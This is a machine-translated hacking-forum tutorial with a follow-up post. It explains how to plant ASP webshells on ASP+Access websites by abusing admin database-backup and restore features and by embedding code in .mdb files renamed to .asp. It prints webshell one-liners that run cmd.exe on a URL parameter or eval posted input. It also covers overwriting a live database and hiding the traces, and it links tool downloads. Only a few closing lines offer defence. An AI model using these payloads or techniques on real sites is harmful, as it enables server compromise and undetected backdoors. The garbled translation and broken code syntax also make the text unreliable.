Obtain webshell through Access database -- and supplement

Author: LCX

In the case of ASP + MSSQL, it is common for injection to directly obtain a webshell.

ASP + acess is an impossible task, because it is difficult for you to make a difference in the SQL statement of Acess.

However, we can also indirectly obtain a webshell by clever use of some features of the acess program.
1. Back up data to shell using the Acess database.
I used the conventional injection method to get a background password for the download system. However, after entering the background, we found that

You are not allowed to upload. asp,. Asa,. CDX,. CER, and other files in sequence. You can only upload images and RAR compressed files.

Subprogram writers pay great attention to ASP Trojans. Just give up? I rummaged it in the background and sent it

A database backup function is provided. (Figure 1)
Using SQL statements to back up databases? It seems that I still don't know such SQL statements for acess. If I estimate

If it is good, it should be that the FSO function of ASP is called to copy the current database file to another path. Yu

I changed the Haiyang dingduan network asptrojan 2004.aspto 2004.gif and uploaded it to the download system space.

2. It indicates that 2004.gif is backed up in another path and the file name is changed to 2004.asp. (Figure 2

) Click the backup data button in Figure 2, and a webshell is created successfully. If I don't want to borrow it, I should

This can be used as a general work und to obtain the websehll method. I have also tried bbsxp forum and succeeded.
2. Use the database download prevention function to obtain webshell.
To prevent the Acess database from being downloaded, add an ole field to a table in the database and write the field

A binary data containing "<%", and then change the. mdb suffix to. asp to prevent downloading. This approach

The principle is to convert this. mdb into A. asp file, and the. asp file cannot be downloaded. Did you think of it? For example

If we write an ASP backdoor code in the. MDB file, it will certainly be executed. Come on, I

Step by step.
I found the article. MDB file of an article system on the Internet, and opened it with acess2003.

Nodown field. The data type is Ole. Save the table named nodwon as prompted. (I didn't give it here

Set the primary key in the nodwon table ). (Figure 3)
Double-click the nodwon table, click the object option in the Insert menu of acess2003, and select

File Creation option. (Figure 4)
The key step is:
"<% = Server. Createobject (" wscript. Shell "cmd.exe C (" cmd.exe/C "& request

("C"). stdout. readall %> "is saved as 1.asp, and 1.aspis is inserted by clicking Browse in Figure 4.

5 ).

Now we can change this article. mdb to *. asp to be used as an ASP Trojan. This

The usage of this ASP code I wrote in is *. asp? C = cmd command, such as *. asp? C = dir + C :/. Naturally, we want

Let's see how this article. mdb is renamed LCX. asp. Input

Http: // 192.168.0.9: 3005/6 K/LCX. asp? C = dir + D:/, A lot of garbled characters in the browser,

Pull the IE drop-down Bar and the Directory List of D is displayed. Yeah! (Figure 6)

I once tried to write the Haiyang dingnet 2004. ASP code into the database, but I have never succeeded. After all, the code is too complicated.

. You may think that the ASP code I wrote is too simple and has simple functions. You can try the ASP

Code. Yes: http://www.xfocus.net/tools/200404/icyfox007v1.10.rar. No

Note that only <SCRIPT runat = Server

Language = JavaScript> eval (request. Form ('#') + '') </SCRIPT>. Of course, I

But the success rate is very high. In this way, ASP code is inserted into the website's acess

What a clever and terrible ASP backdoor in the database that cannot be found and killed.

LCX another classic article
Http://www.haiyang.net/safety/topic.asp? Id = 410
Remote download: http://freett.com/haiyang/hehe.rar
The compressed package contains ASP code for direct access writing.
 
 

 
I miss my time.

For any management questions of ordinary members, please refer to the official announcement and you must ask
If you have any urgent matters, click here to send me a message, which is not a management question. Generally, do not reply.

Eviloctal, this guy doesn't learn how to lie to Tom and she, but we are 38 people.
There are no women in the world who have TMD-modified procedures. If there are more people, there will be women.

There are three kinds of people: vulgar life, squandering life, and overdraft life.

It will die.

Supplement webshell with access

---------------------------------------------------------------------------

-----
Www.hackbase.com reading: 19953 time: 14:39:08 Source: www.hackbase.com
After reading the article "getting webshell through access" by LCX's eldest brother today, I admire LCX's eldest brother.

And want to try this method.
In order not to break the law, I will use my own website for testing. My trial power IS 3.51. log on to the background, and I

Go straight to the backup database page. Dizzy, although you can customize the Backup Directory and name, but cannot define the current database path

Path and name. The suffix after the backup is also limited to Asa. (figure 1) it seems that there is no way to use this method.

Let's take a look at the data recovery page. You can customize the backup database path for restoration. Use the second method. Next

Dynamic empty database, add a trojan statement to it, and then set the background to upload. mdb files. However

Then upload the database. With the database recovery function, the recovery is successful, yeah! You can use the database as a Trojan.

.
Although the above method was successful, this trojan is far from the top of the ocean 2004 easy to use, how can we use the first method

What about it? Depressing! Suddenly I remembered that since I passed the. mdb database, while the running database is. asp

If all the data is empty, the name of the recovered database is replaced with the name of the currently running database.

Lcxis about converting Trojan horse into .jpg. Why don't I change the Trojan horse into. MDB and use the above method to change the current data?

Is the database overwritten? Just do what you want, change the top 2004 of the ocean to. mdb, upload, restore, and succeed! Yeah! Current Network

The website cannot be accessed. directly enter the database address, and the familiar ocean top 2004 page appears in front of me. However

The problem arises again. Now I'm using my own website for testing, but if it's not accessible to other people's homepages, isn't it?

It is easy to be detected. Therefore, you must remember to back up the database before overwriting the database with a Trojan horse.

Use another Trojan to delete the original Trojan and restore the backed up database.

. (Since 6th, I was excited and said that I could not upload ASP files. Can I use this method to solve this problem)
The following describes the preventive methods. In fact, the preventive methods are also very simple. Currently, many users only read data from the upload directory.

Permissions to ensure security. In fact, we can grant only the read and write permissions to the database, and grant only the read permissions to its files.

You can only check the Trojan horse. To directly overwrite the database, you must allow the upload of MDB files,

However, the website information configuration cannot be modified, and the following method becomes invalid. In addition, you cannot access the database on the web.

The directory we asked, even if it is overwritten, cannot be used.